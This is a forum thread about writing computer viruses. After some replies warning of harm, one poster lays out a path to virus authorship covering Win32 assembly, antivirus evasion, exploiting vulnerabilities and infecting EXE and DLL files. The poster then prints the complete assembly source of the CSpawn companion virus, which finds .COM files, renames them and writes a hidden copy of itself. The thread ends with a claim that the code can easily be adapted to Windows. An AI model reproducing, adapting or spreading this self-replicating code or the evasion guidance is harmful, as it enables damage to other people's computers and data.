Bio, writing and releasing virus ain't good for anyone

-reply by XXXXXX

Replying to Darasen

That is not a virus, but a bug

-reply by Tony

Well if you do make a virus make sure its only for education..I read that in 2003 there was a virus called slammer and well like 27 milion people couldnt use cell phones because of it..If someones house was on fire and they was out in the country they coulda lost there house or somethin because of not bein able 2 call 000 or 911, or someone coulda been impaled on a object and died because of not being able to call emergency..

Anyway my point is a virus can afect people even that don't have the internet or a pc and in a way people can lose there lifes because it not very likely but it is possible(altho guess if there impaled its not just cause the virus they died)...Plus visus cost people heaps of money...

How to write a virus ... interesting

Assuming that you only learned 16xbit assembly using turbo or whatever, on a DOS emulator.

Well first of all u'll have to learn Windows programming, you no longer use inturrups but you use kernel function calls.
Then u'll need to get familiar with a 32xbit assebler such as MASM ( although you could write a virus with C but it wont be as effective as assembly )
There is an excellent tutorial about using MASM here http://win32assembly.online.fr/tutorials.html
You'll also need to study how operating systems work, and how it handles memory, disk space ... and soforth
After that, study how an antivirus works - then you can Search for "Anti-AntiVirus techniques"
Then you'll need to learn about different software vulnurabilities, and how to exploit them, different file formats that your virus will work on ( mainly EXEs and DLLs )
Then you'll want to read about different viral techniques that where used before , boot-sector , memory-residence, device driver viruses .... ect

One last hint ,, search for this name "Mark Ludwig" it should get you started.

After you've finished with all that u'll know that there is no use to write a virus as you can do alot more better stuff with what you've learned

A good virus is not the one that causes more damage, but the one that can ruplicate it self without getting caught.

I've heard recently that they are beggining to use viruses to fix some software valnurabilities, the virus would spread from one place to another fixing the security holes.

Here is an example of a primitive virus i got from some book.
Its call the companion virus ,, It changes the name of a *.com file to *.con file ,, then names it self *.com . When it excecutes it searchs for com files in directory to infect , then it starts the original file ( which is now called *.con ) and terminates

The SPAWNR Virus Listing
The following virus can be assembled into a COM file by
MASM, TASM or A86 and executed directly.
;The CSpawn virus is a simple companion virus to illustrate how a companion
;virus works.
;
;© 1994 American Eagle Publications, Inc. All Rights Reserved!
.model tiny
.code
org 0100h
CSpawn:
mov sp,OFFSET FINISH + 100H ;Change top of stack
mov ah,4AH ;DOS resize memory fctn
mov bx,sp
mov cl,4
shr bx,cl
inc bx ;BX=# of para to keep
int 21H
mov bx,2CH ;set up EXEC param block
mov ax,[bx]
mov WORD PTR [PARAM_BLK],ax ;environment segment
mov ax,cs
mov WORD PTR [PARAM_BLK+4],ax ;@ of parameter string
mov WORD PTR [PARAM_BLK+8],ax ;@ of FCB1
mov WORD PTR [PARAM_BLK+12],ax ;@ of FCB2
mov dx,OFFSET REAL_NAME ;prep to EXEC
46 The Giant Black Book of Computer Viruses
mov bx,OFFSET PARAM_BLK
mov ax,4B00H
int 21H ;execute host
cli
mov bx,ax ;save return code here
mov ax,cs ;AX holds code segment
mov ss,ax ;restore stack first
mov sp,(FINISH - CSpawn) + 200H
sti
push bx
mov ds,ax ;Restore data segment
mov es,ax ;Restore extra segment
mov ah,1AH ;DOS set DTA function
mov dx,80H ;put DTA at offset 80H
int 21H
call FIND_FILES ;Find and infect files
pop ax ;AL holds return value
mov ah,4CH ;DOS terminate function
int 21H ;bye-bye
;The following routine searches for COM files and infects them
FIND_FILES:
mov dx,OFFSET COM_MASK ;search for COM files
mov ah,4EH ;DOS find first file function
xor cx,cx ;CX holds all file attributes
FIND_LOOP: int 21H
jc FIND_DONE ;Exit if no files found
call INFECT_FILE ;Infect the file!
mov ah,4FH ;DOS find next file function
jmp FIND_LOOP ;Try finding another file
FIND_DONE: ret ;Return to caller
COM_MASK db ’*.COM’,0 ;COM file search mask
;This routine infects the file specified in the DTA.
INFECT_FILE:
mov si,9EH ;DTA + 1EH
mov di,OFFSET REAL_NAME ;DI points to new name
INF_LOOP: lodsb ;Load a character
stosb ;and save it in buffer
or al,al ;Is it a NULL?
jnz INF_LOOP ;If so then leave the loop
mov WORD PTR [di-2],’N’ ;change name to CON & add 0
mov dx,9EH ;DTA + 1EH
mov di,OFFSET REAL_NAME
mov ah,56H ;rename original file
int 21H
jc INF_EXIT ;if can’t rename, already done
mov ah,3CH ;DOS create file function
mov cx,2 ;set hidden attribute
int 21H
mov bx,ax ;BX holds file handle
mov ah,40H ;DOS write to file function
mov cx,FINISH - CSpawn ;CX holds virus length
mov dx,OFFSET CSpawn ;DX points to CSpawn of virus
int 21H
mov ah,3EH ;DOS close file function
int 21H
INF_EXIT: ret
REAL_NAME db 13 dup (?) ;Name of host to execute
Companion Viruses 47
;DOS EXEC function parameter block
PARAM_BLK DW ? ;environment segment
DD 80H ;@ of command line
DD 5CH ;@ of first FCB
DD 6CH ;@ of second FCB
FINISH:
end CSpawn

this file looks like it can only work on DOS but not Windows.

xboxrulz

Yes it does, but the point is how it actually works, then you can easily change it to work on windows ..